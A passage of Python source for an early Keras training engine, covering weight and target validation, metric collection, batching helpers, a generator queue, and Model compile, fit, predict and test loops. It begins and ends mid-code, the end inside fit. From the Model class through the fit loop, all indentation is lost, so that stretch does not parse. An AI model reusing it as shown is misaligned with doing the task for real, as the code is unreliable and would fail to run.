                        str(x_weight))
def standardize_class_weights(class_weight, output_names):
    """Normalize `class_weight` to one entry per output (see generic helper)."""
    return standardize_sample_or_class_weights(
        class_weight, output_names, 'class_weight')
def standardize_sample_weights(sample_weight, output_names):
    """Normalize `sample_weight` to one entry per output (see generic helper)."""
    return standardize_sample_or_class_weights(
        sample_weight, output_names, 'sample_weight')
def check_array_lengths(X, Y, W):
    """Validate that inputs, targets and sample weights agree on sample count.

    # Arguments
        X: list of input arrays.
        Y: list of target arrays.
        W: list of sample_weight arrays.

    # Raises
        Exception: if any group is internally inconsistent (different
            first dimensions), or the groups disagree with each other.
    """
    set_x = {x.shape[0] for x in X}
    if len(set_x) != 1:
        raise Exception('All input arrays (x) should have '
                        'the same number of samples.')
    set_y = {y.shape[0] for y in Y}
    if len(set_y) != 1:
        raise Exception('All target arrays (y) should have '
                        'the same number of samples.')
    set_w = {w.shape[0] for w in W}
    if len(set_w) != 1:
        raise Exception('All sample_weight arrays should have '
                        'the same number of samples.')
    # each set is now a singleton; extract the counts
    nb_x = set_x.pop()
    nb_y = set_y.pop()
    nb_w = set_w.pop()
    if nb_x != nb_y:
        raise Exception('Input arrays should have '
                        'the same number of samples as target arrays. Found ' +
                        str(nb_x) + ' input samples and ' +
                        str(nb_y) + ' target samples.')
    if nb_x != nb_w:
        # (fixed: message previously mislabeled this count "target samples")
        raise Exception('Sample_weight arrays should have '
                        'the same number of samples as input arrays. Found ' +
                        str(nb_x) + ' input samples and ' +
                        str(nb_w) + ' sample_weight samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
    """Check that target arrays are compatible with losses and output shapes.

    # Arguments
        targets: list of target (y) arrays.
        losses: list of objective functions (their `__name__` is inspected).
        output_shapes: list of model output shapes.

    # Raises
        Exception: on an integer-class target fed to
            `categorical_crossentropy`, or a shape mismatch for losses
            that require target shape == output shape.
    """
    assert len(targets) == len(losses) == len(output_shapes)
    # losses whose targets must match the output shape exactly.
    # (fixed: this set previously contained the typo 'mean_square_error',
    # which never matched the objective's actual __name__
    # 'mean_squared_error', silently disabling the check for MSE)
    key_losses = {'mean_squared_error',
                  'binary_crossentropy',
                  'categorical_crossentropy'}
    for y, loss, shape in zip(targets, losses, output_shapes):
        if loss.__name__ == 'categorical_crossentropy':
            if y.shape[1] == 1:
                raise Exception('You are passing a target array of shape ' + str(y.shape) +
                                ' while using as loss `categorical_crossentropy`. '
                                '`categorical_crossentropy` expects '
                                'targets to be binary matrices (1s and 0s) '
                                'of shape (samples, classes). '
                                'If your targets are integer classes, '
                                'you can convert them to the expected format via:\n'
                                '```\n'
                                'from keras.utils.np_utils import to_categorical\n'
                                'y_binary = to_categorical(y_int)\n'
                                '```\n'
                                '\n'
                                'Alternatively, you can use the loss function '
                                '`sparse_categorical_crossentropy` instead, '
                                'which does expect integer targets.')
        if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
            raise Exception('A target array with shape ' + str(y.shape) +
                            ' was passed for an output of shape ' + str(shape) +
                            ' while using as loss `' + loss.__name__ + '`. '
                            'This loss expects '
                            'targets to have the same shape '
                            'as the output.')
def collect_metrics(metrics, output_names):
    """Map the user-supplied `metrics` argument to one metric list per output.

    A flat list applies every metric to every output; a dict selects
    metrics per output name; falsy input yields empty lists.
    """
    if not metrics:
        return [[] for _ in output_names]
    if type(metrics) is list:
        # apply all metrics to all outputs (copied so outputs don't share)
        return [copy.copy(metrics) for _ in output_names]
    if type(metrics) is dict:
        nested = []
        for name in output_names:
            entry = metrics.get(name, [])
            nested.append(entry if type(entry) is list else [entry])
        return nested
    raise Exception('Type of `metrics` argument not understood. '
                    'Expected a list or dictionary, found: ' +
                    str(metrics))
def collect_trainable_weights(layer):
    '''Collect all `trainable_weights` attributes from a layer tree,
    excluding any sublayers where `trainable` is set to `False`.
    Results are deduplicated and sorted by weight name for determinism.
    '''
    if not getattr(layer, 'trainable', True):
        return []
    # container types expose their children under different attributes
    cls_name = layer.__class__.__name__
    if cls_name == 'Sequential':
        children = layer.flattened_layers
    elif cls_name == 'Model':
        children = layer.layers
    elif cls_name == 'Graph':
        children = layer._graph_nodes.values()
    else:
        children = None
    if children is None:
        # plain layer: take its own trainable weights
        weights = list(layer.trainable_weights)
    else:
        weights = []
        for child in children:
            weights += collect_trainable_weights(child)
    # dedupe (shared weights may appear more than once), then sort
    weights = list(set(weights))
    weights.sort(key=lambda w: w.name)
    return weights
def batch_shuffle(index_array, batch_size):
    '''Shuffle an index array at whole-batch granularity.
    Useful for shuffling HDF5 arrays
    (where one cannot access arbitrary indices).
    '''
    batch_count = int(len(index_array) / batch_size)
    cutoff = batch_count * batch_size
    # items beyond the last full batch are stashed and re-appended unshuffled
    tail = index_array[cutoff:]
    head = index_array[:cutoff].reshape((batch_count, batch_size))
    np.random.shuffle(head)  # shuffles batch order, keeps each batch intact
    return np.append(head.flatten(), tail)
def make_batches(size, batch_size):
    '''Return a list of (start, end) index tuples that partition `size`
    samples into consecutive batches of at most `batch_size` items
    (the final batch may be smaller).
    '''
    return [(start, min(size, start + batch_size))
            for start in range(0, size, batch_size)]
def slice_X(X, start=None, stop=None):
    '''Slice an array-like, or a list of array-likes:
    - X[start:stop] if X is an array-like
    - [x[start:stop] for x in X] if X is a list

    Can also work on a list/array of indices: `slice_X(x, indices)`.

    # Arguments:
        start: integer start index, or a list/array of indices
        stop: integer stop index; should be None if `start` was a list.
    '''
    def _slice_one(x, begin, end):
        # a start with __len__ is an index collection (fancy indexing)
        if hasattr(begin, '__len__'):
            if hasattr(begin, 'shape'):
                # hdf5 datasets only support list objects as indices
                begin = begin.tolist()
            return x[begin]
        return x[begin:end]

    if type(X) == list:
        return [_slice_one(x, start, stop) for x in X]
    return _slice_one(X, start, stop)
def weighted_objective(fn):
    '''Transforms an objective function `fn(y_true, y_pred)`
    into a sample-weighted, cost-masked objective function
    `fn(y_true, y_pred, weights, mask)`.

    The returned closure applies an optional mask (renormalizing so the
    loss stays proportional to the unmasked fraction), reduces the score
    to the weight array's rank, applies the sample weights, and returns
    the scalar mean.
    '''
    def weighted(y_true, y_pred, weights, mask=None):
        # score_array has ndim >= 2
        score_array = fn(y_true, y_pred)
        if mask is not None:
            # Cast the mask to floatX to avoid float64 upcasting in theano
            mask = K.cast(mask, K.floatx())
            # mask should have the same shape as score_array
            score_array *= mask
            # the loss per batch should be proportional
            # to the number of unmasked samples.
            score_array /= K.mean(mask)

        # reduce score_array to same ndim as weight array
        # NOTE(review): K.ndim(weights) runs even when weights is None —
        # presumably weights is always supplied by standardize_weights;
        # confirm before relying on a None path here.
        ndim = K.ndim(score_array)
        weight_ndim = K.ndim(weights)
        score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))

        # apply sample weighting, renormalized over nonzero weights
        if weights is not None:
            score_array *= weights
            score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
        return K.mean(score_array)
    return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
                        sample_weight_mode=None):
    '''Performs weight input validation and standardization
    to a single sample-wise (or timestep-wise) weight array.

    # Arguments
        y: target array.
        sample_weight: optional 1D per-sample weights, or 2D
            per-timestep weights when `sample_weight_mode="temporal"`.
        class_weight: optional dict mapping class index to weight;
            only supported for targets of at most 2 dimensions.
        sample_weight_mode: None (sample-wise) or "temporal".

    # Returns
        A Numpy weight array (defaults to all ones when neither
        `sample_weight` nor `class_weight` is given).

    # Raises
        Exception: on an unknown mode, or shape/rank mismatches.
    '''
    if sample_weight_mode is not None:
        if sample_weight_mode != 'temporal':
            # (fixed: message previously had an unbalanced quote)
            raise Exception('"sample_weight_mode" '
                            'should be None or "temporal". '
                            'Found: ' + str(sample_weight_mode))
        if len(y.shape) < 3:
            raise Exception('Found a sample_weight array for '
                            'an input with shape ' +
                            str(y.shape) + '. '
                            'Timestep-wise sample weighting (use of '
                            'sample_weight_mode="temporal") is restricted to '
                            'outputs that are at least 3D, i.e. that have '
                            'a time dimension.')
        if sample_weight is not None and len(sample_weight.shape) != 2:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + '. '
                            'In order to use timestep-wise sample weighting, '
                            'you should pass a 2D sample_weight array.')
    else:
        if sample_weight is not None and len(sample_weight.shape) != 1:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + '. '
                            'In order to use timestep-wise sample weights, '
                            'you should specify sample_weight_mode="temporal" '
                            'in compile(). If you just mean to use '
                            'sample-wise weights, make sure your '
                            'sample_weight array is 1D.')

    if sample_weight is not None:
        # proper exceptions instead of bare asserts: `assert` is stripped
        # under -O and gave no message (the code carried a TODO for this)
        if len(sample_weight.shape) > len(y.shape):
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) +
                            ' for a target with shape ' + str(y.shape) + '. '
                            'sample_weight cannot have more dimensions '
                            'than the target.')
        if y.shape[:sample_weight.ndim] != sample_weight.shape:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) +
                            ' for a target with shape ' + str(y.shape) + '. '
                            'sample_weight must match the leading '
                            'dimensions of the target.')
        return sample_weight
    elif isinstance(class_weight, dict):
        if len(y.shape) > 2:
            raise Exception('class_weight not supported for '
                            '3+ dimensional targets.')
        if y.shape[1] > 1:
            # one-hot targets: recover the class index per sample
            y_classes = y.argmax(axis=1)
        elif y.shape[1] == 1:
            y_classes = np.reshape(y, y.shape[0])
        else:
            y_classes = y
        weights = np.asarray([class_weight[cls] for cls in y_classes])
        return weights
    else:
        # default: uniform weights of the appropriate rank
        if sample_weight_mode is None:
            return np.ones((y.shape[0],), dtype=K.floatx())
        else:
            return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
def generator_queue(generator, max_q_size=10,
                    wait_time=0.05, nb_worker=1, pickle_safe=False):
    '''Builds a queue out of a data generator.
    If pickle_safe, use a multiprocessing approach. Else, use threading.
    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    # Arguments
        generator: the data generator to drain (via `next`).
        max_q_size: soft cap on queued items (enforced by polling
            `q.qsize()` in the threaded case only).
        wait_time: sleep interval while the queue is full.
        nb_worker: number of worker threads/processes.
        pickle_safe: use processes instead of threads (items must be
            picklable).

    # Returns
        `(q, _stop)`: the queue of generated items and an Event that,
        once set, makes all workers exit their loop.
    '''
    generator_threads = []
    if pickle_safe:
        q = multiprocessing.Queue(maxsize=max_q_size)
        _stop = multiprocessing.Event()
    else:
        q = queue.Queue()
        _stop = threading.Event()
    try:
        def data_generator_task():
            # workers loop until the shared stop event is set
            while not _stop.is_set():
                try:
                    # multiprocessing.Queue enforces maxsize itself; the
                    # threaded queue is throttled manually via qsize()
                    if pickle_safe or q.qsize() < max_q_size:
                        generator_output = next(generator)
                        q.put(generator_output)
                    else:
                        time.sleep(wait_time)
                except Exception:
                    # signal the other workers before propagating
                    _stop.set()
                    raise
        for i in range(nb_worker):
            if pickle_safe:
                # Reset random seed else all children processes share the same seed
                np.random.seed()
                thread = multiprocessing.Process(target=data_generator_task)
            else:
                thread = threading.Thread(target=data_generator_task)
            generator_threads.append(thread)
            # daemonize so workers never block interpreter shutdown
            thread.daemon = True
            thread.start()
    except:
        # startup failed: stop and clean up whatever was already launched,
        # then re-raise (bare except is intentional — nothing is swallowed)
        _stop.set()
        if pickle_safe:
            # Terminate all daemon processes
            for p in generator_threads:
                if p.is_alive():
                    p.terminate()
            q.close()
        raise
    return q, _stop
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
self._collected_trainable_weights = collect_trainable_weights(self)
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[]):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
    '''Abstract method to loop over some data in batches.

    # Arguments
        f: Keras function returning a list of tensors.
        ins: list of tensors to be fed to `f`.
        batch_size: integer batch size.
        verbose: verbosity mode.

    # Returns
        Array of predictions (if the model has a single output)
        or list of arrays of predictions
        (if the model has multiple outputs).
    '''
    num_samples = ins[0].shape[0]
    predictions = []
    progbar = Progbar(target=num_samples) if verbose == 1 else None
    sample_ids = np.arange(num_samples)
    for step, (start, stop) in enumerate(make_batches(num_samples, batch_size)):
        ids = sample_ids[start:stop]
        # The trailing learning-phase flag is a plain Python float and
        # must be forwarded unsliced (exact `float` check is deliberate).
        if type(ins[-1]) is float:
            feed = slice_X(ins[:-1], ids) + [ins[-1]]
        else:
            feed = slice_X(ins, ids)
        results = f(feed)
        if type(results) != list:
            results = [results]
        if step == 0:
            # First batch: allocate one full-size output array per model output.
            for res in results:
                predictions.append(
                    np.zeros((num_samples,) + res.shape[1:], dtype=K.floatx()))
        for i, res in enumerate(results):
            predictions[i][start:stop] = res
        if progbar is not None:
            progbar.update(stop)
    return predictions[0] if len(predictions) == 1 else predictions
def _test_loop(self, f, ins, batch_size=32, verbose=0):
    '''Abstract method to loop over some data in batches.

    Accumulates each output of `f` weighted by batch size, then divides
    by the total sample count, yielding per-output means.

    # Arguments
        f: Keras function returning a list of tensors.
        ins: list of tensors to be fed to `f`.
        batch_size: integer batch size.
        verbose: verbosity mode.

    # Returns
        Scalar loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    nb_sample = ins[0].shape[0]
    outs = []
    if verbose == 1:
        progbar = Progbar(target=nb_sample)
    batches = make_batches(nb_sample, batch_size)
    index_array = np.arange(nb_sample)
    for batch_index, (batch_start, batch_end) in enumerate(batches):
        batch_ids = index_array[batch_start:batch_end]
        # Exact `float` check on purpose: the trailing learning-phase flag
        # is a plain Python float and must not be sliced.
        if type(ins[-1]) is float:
            ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
        else:
            ins_batch = slice_X(ins, batch_ids)
        batch_outs = f(ins_batch)
        if isinstance(batch_outs, list):
            if batch_index == 0:
                # FIX: the original iterated `enumerate(batch_outs)` here,
                # yielding (index, value) pairs where plain elements were
                # intended; it produced the right count only by accident.
                # Allocate one accumulator per model output explicitly.
                outs = [0. for _ in batch_outs]
            for i, batch_out in enumerate(batch_outs):
                # Weight each batch by its size so the final division
                # yields a correct mean even for a ragged last batch.
                outs[i] += batch_out * len(batch_ids)
        else:
            if batch_index == 0:
                outs.append(0.)
            outs[0] += batch_outs * len(batch_ids)
        if verbose == 1:
            progbar.update(batch_end)
    for i, out in enumerate(outs):
        outs[i] /= nb_sample
    if len(outs) == 1:
        return outs[0]
    return outs
def _standardize_user_data(self, x, y,
                           sample_weight=None, class_weight=None,
                           check_batch_dim=True, batch_size=None):
    """Validate and normalize user-provided data before training/testing.

    Maps `x`/`y` (arrays, lists of arrays, or name-keyed dicts) onto the
    model's inputs/outputs, builds one per-sample weight array per output,
    and cross-checks array lengths and loss/target compatibility.

    # Arguments
        x: input data (array, list of arrays, or dict of arrays).
        y: target data (array, list of arrays, or dict of arrays).
        sample_weight: optional per-sample weights.
        class_weight: optional mapping of class index to weight.
        check_batch_dim: accepted for API symmetry; NOTE(review) — the
            calls below hard-code check_batch_dim=False, so this flag
            appears unused here. Confirm before relying on it.
        batch_size: used only for the stateful divisibility check.

    # Returns
        Tuple (x, y, sample_weights) of lists of numpy arrays.

    # Raises
        Exception: if the model is not compiled, or if a stateful model
            receives a sample count not divisible by `batch_size`.
    """
    if not hasattr(self, 'optimizer'):
        raise Exception('You must compile a model before training/testing.'
                        ' Use `model.compile(optimizer, loss)`.')
    output_shapes = []
    # Expected target shape per output: sparse categorical targets are a
    # single integer column; outputs using a custom (non-library) loss get
    # no shape constraint (None).
    for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
        if loss_fn.__name__ == 'sparse_categorical_crossentropy':
            output_shapes.append(output_shape[:-1] + (1,))
        elif getattr(objectives, loss_fn.__name__, None) is None:
            output_shapes.append(None)
        else:
            output_shapes.append(output_shape)
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes,
                               check_batch_dim=False,
                               exception_prefix='model input')
    y = standardize_input_data(y, self.output_names,
                               output_shapes,
                               check_batch_dim=False,
                               exception_prefix='model target')
    sample_weights = standardize_sample_weights(sample_weight,
                                                self.output_names)
    class_weights = standardize_class_weights(class_weight,
                                              self.output_names)
    # Merge sample weights and class weights into one array per output.
    sample_weights = [standardize_weights(ref, sw, cw, mode)
                      for (ref, sw, cw, mode)
                      in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
    check_array_lengths(x, y, sample_weights)
    check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
    if self.stateful and batch_size:
        # Stateful networks carry state across batches, so every batch
        # must be exactly full.
        if x[0].shape[0] % batch_size != 0:
            raise Exception('In a stateful network, '
                            'you should only pass inputs with '
                            'a number of samples that can be '
                            'divided by the batch size. Found: ' +
                            str(x[0].shape[0]) + ' samples')
    return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
        validation_split=0., validation_data=None, shuffle=True,
        class_weight=None, sample_weight=None):
    '''Trains the model for a fixed number of epochs (iterations on a dataset).

    # Arguments
        x: Numpy array of training data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a
            dictionary mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a
            dictionary mapping output names to Numpy arrays.
        batch_size: integer. Number of samples per gradient update.
        nb_epoch: integer, the number of times to iterate over the
            training data arrays.
        verbose: 0, 1, or 2. Verbosity mode.
            0 = silent, 1 = verbose, 2 = one log line per epoch.
        callbacks: list of callbacks to be called during training.
            See [callbacks](/callbacks).
        validation_split: float between 0 and 1:
            fraction of the training data to be used as validation data.
            The model will set apart this fraction of the training data,
            will not train on it, and will evaluate the loss and any
            model metrics on this data at the end of each epoch.
        validation_data: data on which to evaluate the loss and any model
            metrics at the end of each epoch. The model will not be
            trained on this data. This could be a tuple (x_val, y_val)
            or a tuple (val_x, val_y, val_sample_weights).
        shuffle: boolean, whether to shuffle the training data
            before each epoch.
        class_weight: optional dictionary mapping class indices (integers)
            to a weight (float) to apply to the model's loss for the
            samples from this class during training.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample. For
            temporal data you can pass a 2D array (samples,
            sequence_length) and set sample_weight_mode="temporal"
            in compile().

    # Returns
        A `History` instance. Its `history` attribute contains
        all information collected during training.

    # Raises
        Exception: if `validation_data` is neither a 2-tuple nor a 3-tuple.
    '''
    # validate user data
    x, y, sample_weights = self._standardize_user_data(x, y,
                                                       sample_weight=sample_weight,
                                                       class_weight=class_weight,
                                                       check_batch_dim=False,
                                                       batch_size=batch_size)
    # prepare validation data
    if validation_data:
        do_validation = True
        if len(validation_data) == 2:
            val_x, val_y = validation_data
            val_sample_weight = None
        elif len(validation_data) == 3:
            val_x, val_y, val_sample_weight = validation_data
        else:
            # FIX: this branch was a bare `raise` with no active
            # exception, which itself fails with an opaque
            # "RuntimeError: No active exception to re-raise".
            # Raise a descriptive error instead.
            raise Exception('validation_data should be a tuple '
                            '(val_x, val_y) or '
                            '(val_x, val_y, val_sample_weights). '
